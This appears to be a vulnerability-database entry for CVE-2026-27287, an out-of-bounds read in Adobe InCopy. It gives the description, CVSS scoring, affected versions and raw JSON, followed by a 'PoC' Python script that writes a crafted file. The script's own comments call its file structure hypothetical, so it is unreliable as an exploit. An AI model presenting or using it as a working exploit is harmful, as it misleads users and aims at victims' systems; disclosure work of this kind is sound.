Security Vulnerability Report
CVE-2026-27287 CVSS 7.8 HIGH

CVE-2026-27287

Published: 2026-04-14 21:16:25
Last Modified: 2026-04-15 19:33:39

Description

InCopy versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:incopy:*:*:*:*:*:*:*:* (versions before 20.5.3) - VULNERABLE
cpe:2.3:a:adobe:incopy:*:*:*:*:*:*:*:* (versions 21.0 up to, but not including, 21.3) - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe InCopy <= 20.5.2
Adobe InCopy <= 21.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# PoC for CVE-2026-27287 (Conceptual)
# This script generates a malformed file intended to trigger the out-of-bounds read.
# Note: Actual file format structures for Adobe InCopy are proprietary and complex.
# This is a generic template demonstrating the payload creation concept.

def generate_malicious_file(filename):
    # Simulating a crafted file header
    header = b"\x06\x06\xED\xF5"  # Example magic bytes

    # Constructing a specific pattern that might trigger the parser bug
    # The vulnerability occurs when parsing crafted data, causing OOB read.
    malformed_chunk = b"A" * 100  # Padding

    # Crafting a specific offset or length field (Hypothetical)
    # This value might cause the parser to read past the buffer
    evil_offset = struct.pack('<I', 0xFFFFFFFF)

    with open(filename, 'wb') as f:
        f.write(header)
        f.write(malformed_chunk)
        f.write(evil_offset)

    print(f"[+] Malicious file '{filename}' generated successfully.")
    print("[+] To test: Open this file in a vulnerable version of Adobe InCopy.")

if __name__ == "__main__":
    generate_malicious_file("exploit_CVE-2026-27287.incd")

References

https://helpx.adobe.com/security/products/incopy/apsb26-33.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27287", "sourceIdentifier": "[email protected]", "published": "2026-04-14T21:16:25.497", "lastModified": "2026-04-15T19:33:38.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InCopy versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:incopy:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.5.3", "matchCriteriaId": "4E9AFDF0-6924-4DC2-8CDF-214C302F411A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:incopy:*:*:*:*:*:*:*:*", "versionStartIncluding": "21.0", "versionEndExcluding": "21.3", "matchCriteriaId": "8CA72C62-5102-46F5-AF3B-C715E5C3E0DF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", 
"matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/incopy/apsb26-33.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}